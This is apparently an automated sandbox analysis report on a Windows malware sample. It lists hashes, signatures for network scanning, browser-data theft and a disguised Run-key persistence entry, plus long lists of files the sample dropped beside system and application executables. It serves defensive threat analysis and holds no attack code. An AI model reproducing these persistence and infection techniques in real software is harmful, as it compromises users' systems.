Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
03/04/2024, 18:55
Static task
static1
Behavioral task
behavioral1
Sample
a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe
Resource
win7-20240221-en
General
-
Target
a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe
-
Size
456KB
-
MD5
a3f438a8e89dab04e2649de7e6e9ffa1
-
SHA1
2b61bd13401594fe946cb52d0054ab5e1754a119
-
SHA256
a3aebdb374066a1250ef73bcde03e449e542f278d7d1d0f6c6b3b056619f2774
-
SHA512
98e5186cb17e86b637d305c2e347f59613ddafd86cf5fc1852eec793b432025e7c615014029605c9e697baba24b0d099d40ce0390c4008c3e2c0a69040bdc369
-
SSDEEP
6144:ppMM8EV1kmffCpJipAQeNai17Y56rKbDJDODuLn2WvDUyX8rp/mRTCF:URmfaXiGQeN/7YkrOdii72mI
Malware Config
Signatures
-
Contacts a large (965) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ati display driver = "ÔN@" a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe -
Drops file in System32 directory 64 IoCs
description ioc Process File created C:\Windows\SysWOW64\auditpol.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\dialer.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\msiexec.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\RMActivate.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\dpnsvr.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\finger.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\AtBroker.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\cscript.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\perfmon.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\wiaacmgr.exe a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\mountvol.exe a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\subst.exe a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\wbem\WinMgmt.exe a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\dfrgui.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\openfiles.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\runonce.exe a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\schtasks.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\setx.exe a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\SyncHost.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\Dism.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\IME\IMEJP10\imjppdmg.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\makecab.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\migwiz\migwiz.exe a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\regini.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\bthudtask.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\ntoskrnl.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\SearchFilterHost.exe a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\DisplaySwitch.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\doskey.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\gpscript.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\hh.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\netiougc.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\syskey.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\unlodctr.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\System32\DriverStore\FileRepository\bth.inf_amd64_neutral_e54666f6a3e5af91\fsquirt.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\eudcedit.exe a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\ktmutil.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\mshta.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\regedit.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\convert.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\System32\DriverStore\FileRepository\brmfcwia.inf_amd64_neutral_817b8835aed3d6b7\BrmfRsmg.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\NETSTAT.EXE a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\PresentationHost.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\setupSNK.exe a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\cipher.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\Magnify.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\wevtutil.exe a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\waitfor.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\winrshost.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\CertEnrollCtrl.exe a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\diantz.exe a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\eventcreate.exe a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\RMActivate_ssp_isv.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\Robocopy.exe a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\cttune.exe a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\IME\IMEJP10\IMJPUEX.EXE- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\mcbuilder.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\WerFault.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\logman.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\rasautou.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\fontview.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\poqexec.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\SetIEInstalledDate.exe a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\SysWOW64\svchost.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\FLTLDR.EXE_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files\Java\jdk1.7.0_80\bin\kinit.exe a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files\Windows Media Player\wmpenc.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\jabswitch.exe a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\orbd.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files\Windows Photo Viewer\ImagingDevices.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files (x86)\Common Files\Adobe AIR\Versions\1.0\Adobe AIR Updater.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files\Java\jdk1.7.0_80\bin\orbd.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files\Mozilla Firefox\private_browsing.exe a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateOnDemand.exe a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files (x86)\Microsoft Office\Office14\WORDICON.EXE a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files\7-Zip\7z.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files\Common Files\Microsoft Shared\MSInfo\msinfo32.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files (x86)\Microsoft Office\Office14\PPTICO.EXE_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files\Java\jdk1.7.0_80\bin\idlj.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files\Java\jre7\bin\orbd.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files (x86)\Windows Media Player\wmpconfig.exe a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files\Java\jdk1.7.0_80\bin\jarsigner.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files\Java\jdk1.7.0_80\bin\orbd.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files (x86)\Microsoft Office\Office14\ONENOTE.EXE_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files (x86)\Microsoft Office\Office14\ONENOTE.EXE- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files\Google\Chrome\Application\chrome_proxy.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files\Java\jre7\bin\policytool.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\InkWatson.exe a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files (x86)\Google\Update\DisabledGoogleUpdate.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\MSOICONS.EXE_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files (x86)\Microsoft Office\Office14\MSPUB.EXE- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files\Java\jdk1.7.0_80\bin\apt.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files\Mozilla Firefox\minidump-analyzer.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files\Java\jre7\bin\javaw.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files\Mozilla Firefox\minidump-analyzer.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\A3DUtility.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\InkWatson.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files\Internet Explorer\ielowutil.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateBroker.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files\Mozilla Firefox\crashreporter.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files (x86)\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files (x86)\Common Files\microsoft shared\VSTA\8.0\x86\vsta_ep32.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files\Java\jdk1.7.0_80\bin\javaws.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files\Java\jdk1.7.0_80\bin\tnameserv.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleCrashHandler.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files (x86)\Microsoft Office\Office14\NAMECONTROLSERVER.EXE_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files\Java\jre7\bin\policytool.exe a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files\Windows Media Player\WMPSideShowGadget.exe a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Wordconv.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files\Java\jdk1.7.0_80\bin\java-rmi.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files\Java\jre7\bin\kinit.exe a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files\Java\jdk1.7.0_80\bin\pack200.exe a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files (x86)\Microsoft Office\Office14\excelcnv.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files\Java\jdk1.7.0_80\bin\policytool.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files\Microsoft Games\Mahjong\Mahjong.exe a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files\VideoLAN\VLC\vlc.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files\Google\Chrome\Application\106.0.5249.119\nacl_irt_x86_64.nexe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files\Java\jdk1.7.0_80\bin\jar.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files\Microsoft Games\Multiplayer\Backgammon\bckgzm.exe a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateSetup.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXE_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files\Java\jdk1.7.0_80\bin\keytool.exe a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files\Windows Media Player\setup_wm.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Program Files\Java\jdk1.7.0_80\bin\extcheck.exe a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe -
Drops file in Windows directory 64 IoCs
description ioc Process File created C:\Windows\Installer\{90140000-0011-0000-0000-0000000FF1CE}\misc.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Workflow.Compiler\v4.0_4.0.0.0__31bf3856ad364e35\Microsoft.Workflow.Compiler.exe a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\Microsoft.NET\Framework\v3.5\DataSvcUtil.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\winsxs\amd64_microsoft-windows-autochkconfigurator_31bf3856ad364e35_6.1.7600.16385_none_74b76d3fa1757c6f\chkntfs.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\winsxs\amd64_netfx-dfsvc_b03f5f7f11d50a3a_6.1.7600.16385_none_96dbb959ba7c7a79\dfsvc.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\assembly\GAC_64\mcupdate\6.1.0.0__31bf3856ad364e35\mcupdate.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\Installer\{90140000-0011-0000-0000-0000000FF1CE}\joticon.exe a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\winsxs\msil_addinutil_b77a5c561934e089_6.1.7601.17514_none_1a816bc7556b71eb\AddInUtil.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\winsxs\amd64_microsoft-windows-ime-eashared-ccshared_31bf3856ad364e35_6.1.7601.17514_none_34400a5790d1d336\IMCCPHR.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\winsxs\amd64_microsoft-windows-systray_31bf3856ad364e35_6.1.7600.16385_none_4f466e7a0fbb1a04\systray.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\winsxs\x86_microsoft-windows-os-kernel_31bf3856ad364e35_6.1.7601.21863_none_6e8a5c3d2bac37e9\ntoskrnl.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\Microsoft.NET\Framework\v2.0.50727\dfsvc.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\winsxs\amd64_microsoft-windows-defrag-cmdline_31bf3856ad364e35_6.1.7600.16385_none_2370c162e00680c3\Defrag.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\winsxs\amd64_microsoft-windows-ehome-devices-mcxtask_31bf3856ad364e35_6.1.7600.16385_none_b6bc1aae9d0693c5\McxTask.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\winsxs\amd64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_6.1.7601.17514_none_ce2d22115368db7a\WerFault.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\winsxs\amd64_microsoft-windows-setup-component_31bf3856ad364e35_6.1.7601.17514_none_905283bdc3e1d2d8\audit.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\winsxs\amd64_microsoft-windows-w..for-management-core_31bf3856ad364e35_6.1.7601.17514_none_288b7acec3a75696\WSManHTTPConfig.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\winsxs\amd64_narrator-nonmsil_31bf3856ad364e35_6.1.7601.17514_none_8b63c5e0db87fde8\Narrator.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\assembly\NativeImages_v4.0.30319_32\MSBuild\b93c627ec2e15c2675bcc81edafb10be\MSBuild.ni.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\ehome\mcspad.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\winsxs\wow64_microsoft-windows-icm-ui_31bf3856ad364e35_6.1.7600.16385_none_a0a25363eee12f40\colorcpl.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\winsxs\x86_microsoft-windows-s..line-user-interface_31bf3856ad364e35_6.1.7600.16385_none_dcbdc8e83e2b98be\cmdkey.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\winsxs\amd64_microsoft-windows-t..es-commandlinetools_31bf3856ad364e35_6.1.7601.17514_none_42d65ed50fa3c682\rwinsta.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\winsxs\amd64_microsoft-windows-taskmgr_31bf3856ad364e35_6.1.7601.17514_none_7288349cbfd37b08\taskmgr.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\winsxs\amd64_microsoft-windows-upnpdevicehost_31bf3856ad364e35_6.1.7600.16385_none_1ddd261c4e350476\upnpcont.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\winsxs\amd64_microsoft-windows-x..rtificateenrollment_31bf3856ad364e35_6.1.7601.17514_none_51bcbc61a5466a58\CertEnrollCtrl.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\winsxs\x86_microsoft-windows-m..ommandlineutilities_31bf3856ad364e35_6.1.7600.16385_none_7cf343cac8a829ec\doskey.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\assembly\GAC_64\mcupdate\6.1.0.0__31bf3856ad364e35\mcupdate.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\assembly\NativeImages_v2.0.50727_32\WsatConfig\96a8bdafba9f9d3e33cd974bfaa67e58\WsatConfig.ni.exe a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\winsxs\x86_microsoft-windows-findstr_31bf3856ad364e35_6.1.7601.17514_none_2936f54db7f6c08f\findstr.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\MSBuild.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\winsxs\amd64_microsoft-windows-pnpui_31bf3856ad364e35_6.1.7600.16385_none_bacc830144fa7791\dinotify.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\Installer\{90140000-0011-0000-0000-0000000FF1CE}\msouc.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\winsxs\amd64_microsoft-windows-setx_31bf3856ad364e35_6.1.7600.16385_none_086bc77632c16995\setx.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\winsxs\x86_microsoft-windows-dpapi-keys_31bf3856ad364e35_6.1.7600.16385_none_7da9291f2ec46948\dpapimig.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\winsxs\x86_microsoft-windows-shell-previewhost_31bf3856ad364e35_6.1.7601.17514_none_4544cf0e5f20beea\prevhost.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\ehome\McxTask.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\Installer\{90140000-0011-0000-0000-0000000FF1CE}\joticon.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\winsxs\amd64_microsoft-windows-s..restartup-baaupdate_31bf3856ad364e35_6.1.7600.16385_none_9243b833ecd918df\baaupdate.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\winsxs\x86_microsoft-windows-extrac32_31bf3856ad364e35_6.1.7600.16385_none_dafff0c26538f91f\extrac32.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\winsxs\x86_microsoft-windows-s..opertiesperformance_31bf3856ad364e35_6.1.7600.16385_none_5aad0353642dd29f\SystemPropertiesPerformance.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\winsxs\x86_netfx-clrgc_b03f5f7f11d50a3a_6.1.7601.17514_none_f5276fe6b5adf276\clrgc.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\winsxs\amd64_microsoft-windows-driverquery_31bf3856ad364e35_6.1.7600.16385_none_f217bd1caebaa683\driverquery.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\winsxs\amd64_microsoft-windows-newdev_31bf3856ad364e35_6.1.7600.16385_none_6d6b3cfb6a5a1e5a\newdev.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\winsxs\amd64_microsoft-windows-d..-japanese-utilities_31bf3856ad364e35_6.1.7601.17514_none_4b57445488ba33fd\IMJPDCT.EXE_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\winsxs\amd64_microsoft-windows-s..nboxgames-solitaire_31bf3856ad364e35_6.1.7600.16385_none_d1124c00155dfd14\Solitaire.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\winsxs\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7601.17514_none_cde90685eb910636\winlogon.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\winsxs\x86_microsoft-windows-audio-volumecontrol_31bf3856ad364e35_6.1.7601.17514_none_c82fdb5265bc18af\SndVol.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\winsxs\x86_microsoft-windows-g..policy-cmdlinetools_31bf3856ad364e35_6.1.7600.16385_none_3b3f55233d47d4f2\gpresult.exe- a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\MSBuild.exe a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created C:\Windows\winsxs\msil_loadmxf_31bf3856ad364e35_6.1.7600.16385_none_388de5065074b62c\loadmxf.exe_ a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe File created 